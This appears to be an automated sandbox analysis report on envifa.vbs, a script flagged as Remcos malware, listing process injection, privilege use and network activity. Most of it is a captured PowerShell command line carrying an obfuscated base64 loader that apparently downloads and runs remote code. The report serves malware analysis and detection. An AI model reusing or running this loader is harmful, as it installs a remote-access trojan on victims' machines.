Analysis Overview
SHA256
e0ad36136960203db1aea53780b49ef2c819ad31d68980822c4dff0d8dab1a14
Threat Level: Known bad
The file envifa.vbs was found to be: Known bad.
Malicious Activity Summary
Remcos
Blocklisted process makes network request
Checks computer location settings
Drops startup file
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-07 12:48
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-07 12:48
Reported
2023-12-07 12:50
Platform
win7-20231023-en
Max time kernel
118s
Max time network
121s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2104 wrote to memory of 2108 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2104 wrote to memory of 2108 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2104 wrote to memory of 2108 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2108 wrote to memory of 2648 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2108 wrote to memory of 2648 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2108 wrote to memory of 2648 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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